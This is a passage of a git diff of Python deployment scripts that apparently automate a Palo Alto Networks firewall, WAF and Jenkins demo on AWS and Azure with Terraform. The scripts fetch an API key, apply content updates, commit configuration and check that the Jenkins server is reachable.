avoid race conditions') + time.sleep(10) + fw = firewall.Firewall(hostname=fwMgtIP, api_username=username, api_password=password) + + + logger.info("Updating firewall with latest content pack") + update_fw(fwMgtIP, api_key) + + # + # Configure Firewall + # + WebInFWConf_vars.update({'FW_Mgmt_IP': fwMgtIP}) + + logger.info("Applying addtional config to firewall") + + return_code, web_in_fw_conf_out = apply_tf('./WebInFWConf', WebInFWConf_vars, 'WebInFWConf') + + if return_code == 0: + update_status('web_in_fw_conf', 'success') + logger.info("WebInFWConf failed") + + else: + logger.info("WebInFWConf failed") + update_status('web_in_deploy_status', 'error') + print(json.dumps(status_output)) + exit(1) + + logger.info("Commit changes to firewall") + + fw.commit() + logger.info("waiting for commit") + time.sleep(60) + logger.info("waiting for commit") + + # + # Check Jenkins + # + + logger.info('Checking if Jenkins Server is ready') + + res = getServerStatus(albDns) + + if res == 'server_up': + logger.info('Jenkins Server is ready') + logger.info('\n\n ### Deployment Complete ###') + logger.info('\n\n Connect to Jenkins Server at http://{}'.format(albDns)) + else: + logger.info('Jenkins Server is down') + logger.info('\n\n ### Deployment Complete ###') + + # dump out status to stdout + print(json.dumps(status_output)) + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='Get Terraform Params') + parser.add_argument('-u', '--username', help='Firewall Username', required=True) + parser.add_argument('-p', '--password', help='Firewall Password', required=True) + parser.add_argument('-r', '--resource_group', help='Resource Group', required=True) + parser.add_argument('-j', '--azure_region', help='Azure Region', required=True) + + args = parser.parse_args() + username = args.username + password = args.password + resource_group = args.resource_group + azure_region = args.azure_region + + main(username, password, resource_group, azure_region) diff --git a/aws/Jenkins_proj-master/deploy.py b/aws/Jenkins_proj-master/deploy.py index ed65e372..9d50e583 100644 --- a/aws/Jenkins_proj-master/deploy.py +++ b/aws/Jenkins_proj-master/deploy.py @@ -1,19 +1,25 @@ #!/usr/bin/env python3 """ -Paloaltonetworks deploy.py +# Copyright (c) 2018, Palo Alto Networks +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. -This software is provided without support, warranty, or guarantee. -Use at your own risk. +# Author: Justin Harris jharris@paloaltonetworks.com Usage python deploy.py -u -p' -k -s -r - -Contents of json dict - -{"WebInDeploy": "Success", "WebInFWConf": "Success", "waf_conf": "Success"} -`""" - +""" import argparse import json import logging @@ -25,16 +31,17 @@ import requests import urllib3 +import xmltodict urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) from pandevice import firewall -from pandevice import updater +from collections import OrderedDict from python_terraform import Terraform gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2) -logging.basicConfig(level=logging.DEBUG) +logging.basicConfig(level=logging.INFO) logger = logging.getLogger() handler = logging.StreamHandler() formatter = logging.Formatter('%(levelname)-8s %(message)s') @@ -47,8 +54,16 @@ def send_request(call): + """ + Handles sending requests to API + :param call: url + :return: Retruns result of call. Will return response for codes between 200 and 400. + If 200 response code is required check value in response + """ + headers = {'Accept-Encoding': 'None', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} + try: - r = requests.get(call, verify=False, timeout=5) + r = requests.get(call, headers=headers, verify=False, timeout=5) r.raise_for_status() except requests.exceptions.HTTPError as errh: ''' @@ -73,148 +88,225 @@ class DeployRequestException(Exception): pass -def update_fw(fwMgtIP, api_key): - # # Download latest applications and threats + +def walkdict(dict, match): + """ + Finds a key in a dict or nested dict and returns the value associated with it + :param d: dict or nested dict + :param key: key value + :return: value associated with key + """ + for key, v in dict.items(): + if key == match: + jobid = v + return jobid + elif isinstance(v, OrderedDict): + found = walkdict(v, match) + if found is not None: + return found + + + +def check_pending_jobs(fwMgtIP, api_key): type = "op" - cmd = "" + cmd = "" call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + key = 'result' + jobs = '' try: r = send_request(call) + logger.info('Got response {} to request for content upgrade '.format(r.text)) + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + jobs = walkdict(dict, key) + else: + logger.info('Didnt get a dict') + if not jobs: + # No jobs pending + return False + else: + # Jobs pending + return True + except: - DeployRequestException - logger.debug("failed to get jobid this time. Try again") - else: - tree = ET.fromstring(r.text) - jobid = tree[0][1].text - print("Download latest Applications and Threats update - " + str(jobid)) + logger.info('Didnt get response to check pending jobs') + return False + + +def update_fw(fwMgtIP, api_key): + """ + Applies latest AppID, Threat and AV updates to firewall after launch + :param fwMgtIP: Firewall management IP + :param api_key: API key + + """ + # # Download latest applications and threats + + type = "op" + cmd = "" + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + getjobid = 0 + jobid = '' + key = 'job' + + # FIXME - Remove Duplicate code for parsing jobid + + while getjobid == 0: + try: + r = send_request(call) + logger.info('Got response {} to request for content upgrade '.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + jobid = walkdict(dict, key) + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 + + # FIXME - Remove Duplicate code for showing job status + completed = 0 while (completed == 0): - time.sleep(10) + time.sleep(45) call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key) try: r = send_request(call) + logger.info('Got Response {} to show jobs '.format(r.text)) except: DeployRequestException logger.debug("failed to get jobid this time. Try again") else: tree = ET.fromstring(r.text) - - if (tree[0][0][5].text == 'FIN'): - logger.debug("APP+TP download Status - " + str(tree[0][0][5].text)) - completed = 1 + if tree.attrib['status'] == 'success': + try: + if (tree[0][0][5].text == 'FIN'): + logger.debug("APP+TP download Complete ") + completed = 1 + print("Download latest Applications and Threats update") + status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str( + tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Checking job is complete') + completed = 1 else: - print("Download latest Applications and Threats update") - status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str( - tree[0][0][12].text) + "% complete" - print('{0}\r'.format(status)) + logger.info('Unable to determine job status') + completed = 1 - # Install latest applications and threats without committing - time.sleep(1) + # Install latest content update type = "op" cmd = "latestno" call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) - try: - r = send_request(call) - except: - DeployRequestException - logger.debug("Requested content install but got response{}".format(r)) - else: - print("request for content upgrade response was {}".format(r.text)) - tree = ET.fromstring(r.text) - if tree.attrib['status'] == 'success': - ''' - Check that we were able to schedule the install - Valid response would contain - - Invalid response would contain - - ''' - jobid = tree[0][1].text - print("Install latest Applications and Threats update - " + str(jobid)) - - completed = 0 - while (completed == 0): - time.sleep(10) - call = "https://%s/api/?type=op&cmd=%s&key=%s" % ( - fwMgtIP, jobid, api_key) - r = send_request(call) - tree = ET.fromstring(r.text) + getjobid = 0 + jobid = '' + key = 'job' - if (tree[0][0][5].text == 'FIN'): - logger.debug("APP+TP install Status - " + str(tree[0][0][5].text) + " " + str( - tree[0][0][12].text) + "% complete") - completed = 1 - else: - print("tree value {}".format(tree[0][0][5].text)) - status = "APP+TP install Status - " + str(tree[0][0][5].text) + " " + str( - tree[0][0][12].text) + "% complete" - print('{0}\r'.format(status)) + while getjobid == 0: + try: + r = send_request(call) + logger.info('Got response {} to request for content upgrade '.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. Try again") else: - logger.debug("Unable to schedule install") - - # download latest anti-virus update - type = "op" - cmd = "" - call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) - try: - r = send_request(call) - except: - DeployRequestException - logger.debug("Requested AV download but got response{}".format(DeployRequestException)) - else: - tree = ET.fromstring(r.text) - jobid = tree[0][1].text - logger.debug("Got Jobid {} for download latest Anti-Virus update".format(str(jobid))) + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + jobid = walkdict(dict, key) + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 completed = 0 while (completed == 0): - time.sleep(10) + time.sleep(45) call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key) - r = send_request(call) - - tree = ET.fromstring(r.text) - if (tree[0][0][5].text == 'FIN'): - logger.debug( - "AV download Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete") - completed = 1 + try: + r = send_request(call) + logger.info('Got Response {} to show jobs '.format(r.text)) + except: + DeployRequestException + logger.debug("failed to get jobid this time. Try again") else: - status = "AV download Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete" - print('{0}\r'.format(status)) + tree = ET.fromstring(r.text) + if tree.attrib['status'] == 'success': + try: + if (tree[0][0][5].text == 'FIN'): + logger.debug("APP+TP Install Complete ") + completed = 1 + print("Install latest Applications and Threats update") + status = "APP+TP Install Status - " + str(tree[0][0][5].text) + " " + str( + tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Checking job is complete') + completed = 1 + else: + logger.info('Unable to determine job status') + completed = 1 - # install latest anti-virus update without committing + + # Download latest anti-virus update without committing + getjobid = 0 + jobid = '' type = "op" - cmd = "latestno" - call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) - r = send_request(call) - tree = ET.fromstring(r.text) - if tree.attrib['status'] == 'success': - ''' - Check that we were able to schedule the install - Valid response would contain - - Invalid response would contain - - ''' - jobid = tree[0][1].text - print("Install latest Anti-Virus update - " + str(jobid)) - - completed = 0 - while (completed == 0): - time.sleep(10) - call = "https://%s/api/?type=op&cmd=%s&key=%s" % ( - fwMgtIP, jobid, api_key) + cmd = "" + key = 'job' + while getjobid == 0: + try: + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) r = send_request(call) - tree = ET.fromstring(r.text) + logger.info('Got response to request AV install {}'.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + jobid = walkdict(dict, key) + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 - if (tree[0][0][5].text == 'FIN'): - logger.debug( - "AV install Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete") + completed = 0 + while (completed == 0): + time.sleep(45) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % ( + fwMgtIP, jobid, api_key) + r = send_request(call) + tree = ET.fromstring(r.text) + logger.debug('Got response for show job {}'.format(r.text)) + if tree.attrib['status'] == 'success': + try: + if (tree[0][0][5].text == 'FIN'): + logger.info("AV install Status Complete ") + completed = 1 + else: + status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid)) completed = 1 - else: - status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete" - print('{0}\r'.format(status)) - else: - logger.debug("Unable to schedule install") + else: + logger.info('Unable to determine job status') + completed = 1 def getApiKey(hostname, username, password): @@ -232,8 +324,8 @@ def getApiKey(hostname, username, password): except DeployRequestException as updateerr: - logger.info("No response from FW. Wait 20 secs before retry") - time.sleep(10) + logger.info("No response from FW. Wait 30 secs before retry") + time.sleep(30) continue else: @@ -243,50 +335,6 @@ def getApiKey(hostname, username, password): return api_key -# def getFirewallStatus(fwMgtIP, api_key): -# """ -# Gets the firewall status by sending the API request show chassis status. -# :param fwMgtIP: IP Address of firewall interface to be probed -# :param api_key: Panos API key -# """ -# global gcontext -# -# cmd = urllib.request.Request( -# "https://" + fwMgtIP + "/api/?type=op&cmd=&key=" + api_key) -# # Send command to fw and see if it times out or we get a response -# logger.info("Sending command 'show chassis status' to firewall") -# try: -# response = urllib.request.urlopen(cmd, data=None, context=gcontext, timeout=5).read() -# -# except urllib.error.URLError: -# logger.debug("No response from FW. So maybe not up!") -# return 'no' -# # sleep and check again? -# else: -# logger.debug("Got response to 'show chassis status' {}".format(response)) -# -# resp_header = ET.fromstring(response) -# logger.debug('Response header is {}'.format(resp_header)) -# -# if resp_header.tag != 'response': -# logger.debug("Did not get a valid 'response' string...maybe a timeout") -# return 'cmd_error' -# -# if resp_header.attrib['status'] == 'error': -# logger.debug("Got an error for the command") -# return 'cmd_error' -# -# if resp_header.attrib['status'] == 'success': -# # The fw responded with a successful command execution. So is it ready? -# for element in resp_header: -# if element.text.rstrip() == 'yes': -# logger.info("FW Chassis is ready to accept configuration and connections") -# return 'yes' -# else: -# logger.info("FW Chassis not ready, still waiting for dataplane") -# time.sleep(10) -# return 'almost' - def getFirewallStatus(fwIP, api_key): fwip = fwIP @@ -398,7 +446,53 @@ def getServerStatus(IP): return 'server_down' -def main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key_pair, bootstrap_bucket): +def apply_tf(working_dir, vars, description): + """ + Handles terraform operations and returns variables in outputs.tf as a dict. + :param working_dir: Directory that contains the tf files + :param vars: Additional variables passed in to override defaults equivalent to -var + :param description: Description of the deployment for logging purposes + :return: return_code - 0 for success or other for failure + outputs - Dictionary of the terraform outputs defined in the outputs.tf file + + """ + # Set run_plan to TRUE is you wish to run terraform plan before apply + run_plan = False + kwargs = {"auto-approve": True} + + # Class Terraform uses subprocess and setting capture_output to True will capture output + capture_output = kwargs.pop('capture_output', False) + + if capture_output is True: + stderr = subprocess.PIPE + stdout = subprocess.PIPE + else: + # if capture output is False, then everything will essentially go to stdout and stderrf + stderr = sys.stderr + stdout = sys.stdout + + start_time = time.asctime() + print('Starting Deployment at {}\n'.format(start_time)) + + # Create Bootstrap + + tf = Terraform(working_dir=working_dir) + + tf.cmd('init') + if run_plan: + # print('Calling tf.plan') + tf.plan(capture_output=False) + + return_code, stdout, stderr = tf.apply(vars=vars, capture_output=capture_output, + skip_plan=True, **kwargs) + outputs = tf.output() + + logger.debug('Got Return code {} for deployment of {}'.format(return_code, description)) + + return (return_code, outputs) + + +def main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key_pair): username = username password = password aws_access_key = aws_access_key @@ -407,20 +501,14 @@ def main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key ec2_key_pair = ec2_key_pair albDns = '' nlbDns = '' - fwMgt = '' - - default_vars = { - 'aws_access_key': aws_access_key, - 'aws_secret_key': aws_secret_key, - 'aws_region': aws_region - } + fwMgtIP = '' WebInDeploy_vars = { 'aws_access_key': aws_access_key, 'aws_secret_key': aws_secret_key, 'aws_region': aws_region, 'ServerKeyName': ec2_key_pair, - 'bootstrap_s3bucket': bootstrap_bucket + # 'bootstrap_s3bucket': bootstrap_bucket } waf_conf_vars = { @@ -437,111 +525,74 @@ def main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key 'aws_secret_key': aws_secret_key, 'aws_region': aws_region, 'ServerKeyName': ec2_key_pair, - 'mgt-ipaddress-fw1': fwMgt, + 'mgt-ipaddress-fw1': fwMgtIP, 'nlb-dns': nlbDns, 'username': username, 'password': password } - # Set run_plan to TRUE is you wish to run terraform plan before apply - run_plan = False - kwargs = {"auto-approve": True} - - # Class Terraform uses subprocess and setting capture_output to True will capture output - capture_output = kwargs.pop('capture_output', False) - - if capture_output is True: - stderr = subprocess.PIPE - stdout = subprocess.PIPE - else: - # if capture output is False, then everything will essentially go to stdout and stderrf - stderr = sys.stderr - stdout = sys.stdout - start_time = time.asctime() - print(f'Starting Deployment at {start_time}\n') + # # Set run_plan to TRUE is you wish to run terraform plan before apply - # Build Infrastructure - - tf = Terraform(working_dir='./WebInDeploy') - - tf.cmd('init') - if run_plan: - # print('Calling tf.plan') - tf.plan(capture_output=False, var=WebInDeploy_vars) + run_plan = False - return_code1, stdout, stderr = tf.apply(var=WebInDeploy_vars, capture_output=capture_output, skip_plan=True, - **kwargs) + kwargs = {"auto-approve": True} - web_in_deploy_output = tf.output() + # + return_code, web_in_deploy_output = apply_tf('./WebInDeploy', WebInDeploy_vars, 'WebInDeploy') - logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code1)) + logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code)) # update_status('web_in_deploy_stdout', stdout) update_status('web_in_deploy_output', web_in_deploy_output) - if return_code1 != 0: + if return_code == 0: + update_status('web_in_deploy_status', 'success') + albDns = web_in_deploy_output['ALB-DNS']['value'] + fwMgtIP = web_in_deploy_output['MGT-IP-FW-1']['value'] + nlbDns = web_in_deploy_output['NLB-DNS']['value'] + fwMgtIP = web_in_deploy_output['MGT-IP-FW-1']['value'] + logger.info("Got these values from output of WebInDeploy \n\n") + logger.info("AppGateway address is {}".format(albDns)) + logger.info("Internal loadbalancer address is {}".format(nlbDns)) + logger.info("Firewall Mgt address is {}".format(fwMgtIP)) + + else: logger.info("WebInDeploy failed") update_status('web_in_deploy_status', 'error') - update_status('web_in_deploy_stderr', stderr) print(json.dumps(status_output)) exit(1) - else: - update_status('web_in_deploy_status', 'success') - - albDns = tf.output('ALB-DNS') - fwMgt = tf.output('MGT-IP-FW-1') - nlbDns = tf.output('NLB-DNS') - fwMgtIP = fwMgt - WebInFWConf_vars['mgt-ipaddress-fw1'] = fwMgt + WebInFWConf_vars['mgt-ipaddress-fw1'] = fwMgtIP WebInFWConf_vars['nlb-dns'] = nlbDns WebInDeploy_vars['alb_dns'] = albDns WebInDeploy_vars['nlb-dns'] = nlbDns - # # Apply WAF Rules # + return_code, waf_conf_out = apply_tf('./waf_conf', waf_conf_vars, 'Waf_conf') - tf = Terraform(working_dir='./waf_conf') - tf.cmd('init') - kwargs = {"auto-approve": True} - logger.info("Applying WAF config to App LB") - - if run_plan: - tf.plan(capture_output=capture_output, var=vars, **kwargs) - - return_code3, stdout, stderr = tf.apply(capture_output=capture_output, skip_plan=True, - var=waf_conf_vars, **kwargs) - - waf_conf_out = tf.output() + logger.debug('Got Return code for deploy waf_conf {}'.format(return_code)) update_status('waf_conf_output', waf_conf_out) # update_status('waf_conf_stdout', stdout) - # update_status('waf_conf_stderr', stderr) - - logger.debug('Got Return code to deploy waf_conf {}'.format(return_code3)) - - if return_code3 != 0: + # update_status('waf_conf_stderr', stderr + logger.debug('Got Return code to deploy waf_conf {}'.format(return_code)) + if return_code == 0: + update_status('waf_conf_status', 'success') + else: logger.info("waf_conf failed") update_status('waf_conf_status', 'error') - update_status('waf_conf_stderr', stderr) print(json.dumps(status_output)) exit(1) - else: - update_status('waf_conf_status', 'success') - - logger.info("Got these values from output of first run\n\n") - logger.info("ALB address is {}".format(albDns)) - logger.info("nlb address is {}".format(nlbDns)) - logger.info("Firewall Mgt address is {}".format(fwMgt)) # # Check firewall is up and running # # - api_key = getApiKey(fwMgtIP, username, password) + #FIXME Add timeout after 3 minutes + while True: err = getFirewallStatus(fwMgtIP, api_key) if err == 'cmd_error': @@ -565,56 +616,30 @@ def main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key logger.debug('Giving the FW another 10 seconds to fully come up to avoid race conditions') time.sleep(10) fw = firewall.Firewall(hostname=fwMgtIP, api_username=username, api_password=password) + logger.info("Updating firewall with latest content pack") update_fw(fwMgtIP, api_key) - updateHandle = updater.ContentUpdater(fw) - - # updateHandle.download(fw) - # logger.info("Waiting 3 minutes for content update to download") - # time.sleep(210) - # updateHandle.install() # # Configure Firewall # - tf = Terraform(working_dir='./WebInFWConf') - tf.cmd('init') - kwargs = {"auto-approve": True} - - logger.info("Applying addtional config to firewall") + return_code, web_in_fw_conf_out = apply_tf('./WebInFWConf', WebInFWConf_vars, 'WebInFWConf') - WebInFWConf_vars['mgt-ipaddress-fw1'] = fwMgt + if return_code == 0: + update_status('web_in_fw_conf', 'success') + logger.info("WebInFWConf success") - if run_plan: - tf.plan(capture_output=capture_output, var=WebInFWConf_vars) - - # update initial vars with generated fwMgt ip - - return_code2, stdout, stderr = tf.apply(capture_output=capture_output, skip_plan=True, - var=WebInFWConf_vars, **kwargs) - - web_in_fw_conf_out = tf.output() - - update_status('web_in_fw_conf_output', web_in_fw_conf_out) - # update_status('web_in_fw_conf_stdout', stdout) - - logger.debug('Got Return code for deploy WebInFwConf {}'.format(return_code2)) - - if return_code2 != 0: - logger.error("WebFWConfy failed") - update_status('web_in_fw_conf_status', 'error') - update_status('web_in_fw_conf_stderr', stderr) + else: + logger.info("WebInFWConf failed") + update_status('web_in_deploy_status', 'error') print(json.dumps(status_output)) exit(1) - else: - update_status('web_in_fw_conf_status', 'success') logger.info("Commit changes to firewall") fw.commit() - logger.info("waiting for commit") time.sleep(60) logger.info("waiting for commit") @@ -624,8 +649,6 @@ def main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key logger.info('Checking if Jenkins Server is ready') - # FIXME - add outputs for all 3 dirs - res = getServerStatus(albDns) if res == 'server_up': @@ -636,9 +659,6 @@ def main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key logger.info('Jenkins Server is down') logger.info('\n\n ### Deployment Complete ###') - # dump out status to stdout - print(json.dumps(status_output)) - if __name__ == '__main__': parser = argparse.ArgumentParser(description='Get Terraform Params') @@ -648,7 +668,7 @@ def main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key parser.add_argument('-s', '--aws_secret_key', help='AWS Secret', required=True) parser.add_argument('-r', '--aws_region', help='AWS Region', required=True) parser.add_argument('-c', '--aws_key_pair', help='AWS EC2 Key Pair', required=True) - parser.add_argument('-b', '--s3_bootstrap_bucket', help='AWS S3 Bootstrap bucket', required=True) + # parser.add_argument('-b', '--s3_bootstrap_bucket', help='AWS S3 Bootstrap bucket', required=True) args = parser.parse_args() username = args.username @@ -657,6 +677,6 @@ def main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key aws_secret_key = args.aws_secret_key aws_region = args.aws_region ec2_key_pair = args.aws_key_pair - bootstrap_s3bucket = args.s3_bootstrap_bucket + # bootstrap_s3bucket = args.s3_bootstrap_bucket - main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key_pair, bootstrap_s3bucket) + main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key_pair) diff --git a/aws/Jenkins_proj-master/deployold.py b/aws/Jenkins_proj-master/deployold.py new file mode 100644 index 00000000..ed65e372 --- /dev/null +++ b/aws/Jenkins_proj-master/deployold.py @@ -0,0 +1,662 @@ +#!/usr/bin/env python3 +""" +Paloaltonetworks deploy.py + +This software is provided without support, warranty, or guarantee. +Use at your own risk. + +Usage + +python deploy.py -u -p' -k -s -r + +Contents of json dict + +{"WebInDeploy": "Success", "WebInFWConf": "Success", "waf_conf": "Success"} +`""" + +import argparse +import json +import logging +import ssl +import subprocess +import sys +import time +import xml.etree.ElementTree as ET + +import requests +import urllib3 + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +from pandevice import firewall +from pandevice import updater +from python_terraform import Terraform + +gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2) + +logging.basicConfig(level=logging.DEBUG) +logger = logging.getLogger() +handler = logging.StreamHandler() +formatter = logging.Formatter('%(levelname)-8s %(message)s') +handler.setFormatter(formatter) +logger.addHandler(handler) +logger.setLevel(logging.INFO) + +# global var to keep status output +status_output = dict() + + +def send_request(call): + try: + r = requests.get(call, verify=False, timeout=5) + r.raise_for_status() + except requests.exceptions.HTTPError as errh: + ''' + Firewall may return 5xx error when rebooting. Need to handle a 5xx response + ''' + logger.debug("DeployRequestException Http Error:") + raise DeployRequestException("Http Error:") + except requests.exceptions.ConnectionError as errc: + logger.debug("DeployRequestException Connection Error:") + raise DeployRequestException("Connection Error") + except requests.exceptions.Timeout as errt: + logger.debug("DeployRequestException Timeout Error:") + raise DeployRequestException("Timeout Error") + except requests.exceptions.RequestException as err: + logger.debug("DeployRequestException RequestException Error:") + raise DeployRequestException("Request Error") + else: + return r + + +class DeployRequestException(Exception): + pass + + +def update_fw(fwMgtIP, api_key): + # # Download latest applications and threats + type = "op" + cmd = "" + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + try: + r = send_request(call) + except: + DeployRequestException + logger.debug("failed to get jobid this time. Try again") + else: + tree = ET.fromstring(r.text) + jobid = tree[0][1].text + print("Download latest Applications and Threats update - " + str(jobid)) + completed = 0 + while (completed == 0): + time.sleep(10) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key) + try: + r = send_request(call) + except: + DeployRequestException + logger.debug("failed to get jobid this time. Try again") + else: + tree = ET.fromstring(r.text) + + if (tree[0][0][5].text == 'FIN'): + logger.debug("APP+TP download Status - " + str(tree[0][0][5].text)) + completed = 1 + else: + print("Download latest Applications and Threats update") + status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str( + tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + + # Install latest applications and threats without committing + time.sleep(1) + type = "op" + cmd = "latestno" + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + try: + r = send_request(call) + except: + DeployRequestException + logger.debug("Requested content install but got response{}".format(r)) + else: + print("request for content upgrade response was {}".format(r.text)) + tree = ET.fromstring(r.text) + if tree.attrib['status'] == 'success': + ''' + Check that we were able to schedule the install + Valid response would contain + + Invalid response would contain + + ''' + jobid = tree[0][1].text + print("Install latest Applications and Threats update - " + str(jobid)) + + completed = 0 + while (completed == 0): + time.sleep(10) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % ( + fwMgtIP, jobid, api_key) + r = send_request(call) + tree = ET.fromstring(r.text) + + if (tree[0][0][5].text == 'FIN'): + logger.debug("APP+TP install Status - " + str(tree[0][0][5].text) + " " + str( + tree[0][0][12].text) + "% complete") + completed = 1 + else: + print("tree value {}".format(tree[0][0][5].text)) + status = "APP+TP install Status - " + str(tree[0][0][5].text) + " " + str( + tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + else: + logger.debug("Unable to schedule install") + + # download latest anti-virus update + type = "op" + cmd = "" + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + try: + r = send_request(call) + except: + DeployRequestException + logger.debug("Requested AV download but got response{}".format(DeployRequestException)) + else: + tree = ET.fromstring(r.text) + jobid = tree[0][1].text + logger.debug("Got Jobid {} for download latest Anti-Virus update".format(str(jobid))) + + completed = 0 + while (completed == 0): + time.sleep(10) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key) + r = send_request(call) + + tree = ET.fromstring(r.text) + if (tree[0][0][5].text == 'FIN'): + logger.debug( + "AV download Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete") + completed = 1 + else: + status = "AV download Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + + # install latest anti-virus update without committing + type = "op" + cmd = "latestno" + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + r = send_request(call) + tree = ET.fromstring(r.text) + if tree.attrib['status'] == 'success': + ''' + Check that we were able to schedule the install + Valid response would contain + + Invalid response would contain + + ''' + jobid = tree[0][1].text + print("Install latest Anti-Virus update - " + str(jobid)) + + completed = 0 + while (completed == 0): + time.sleep(10) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % ( + fwMgtIP, jobid, api_key) + r = send_request(call) + tree = ET.fromstring(r.text) + + if (tree[0][0][5].text == 'FIN'): + logger.debug( + "AV install Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete") + completed = 1 + else: + status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + else: + logger.debug("Unable to schedule install") + + +def getApiKey(hostname, username, password): + ''' + Generate the API key from username / password + ''' + + call = "https://%s/api/?type=keygen&user=%s&password=%s" % (hostname, username, password) + + api_key = "" + while True: + try: + # response = urllib.request.urlopen(url, data=encoded_data, context=ctx).read() + response = send_request(call) + + + except DeployRequestException as updateerr: + logger.info("No response from FW. Wait 20 secs before retry") + time.sleep(10) + continue + + else: + api_key = ET.XML(response.content)[0][0].text + logger.info("FW Management plane is Responding so checking if Dataplane is ready") + logger.debug("Response to get_api is {}".format(response)) + return api_key + + +# def getFirewallStatus(fwMgtIP, api_key): +# """ +# Gets the firewall status by sending the API request show chassis status. +# :param fwMgtIP: IP Address of firewall interface to be probed +# :param api_key: Panos API key +# """ +# global gcontext +# +# cmd = urllib.request.Request( +# "https://" + fwMgtIP + "/api/?type=op&cmd=&key=" + api_key) +# # Send command to fw and see if it times out or we get a response +# logger.info("Sending command 'show chassis status' 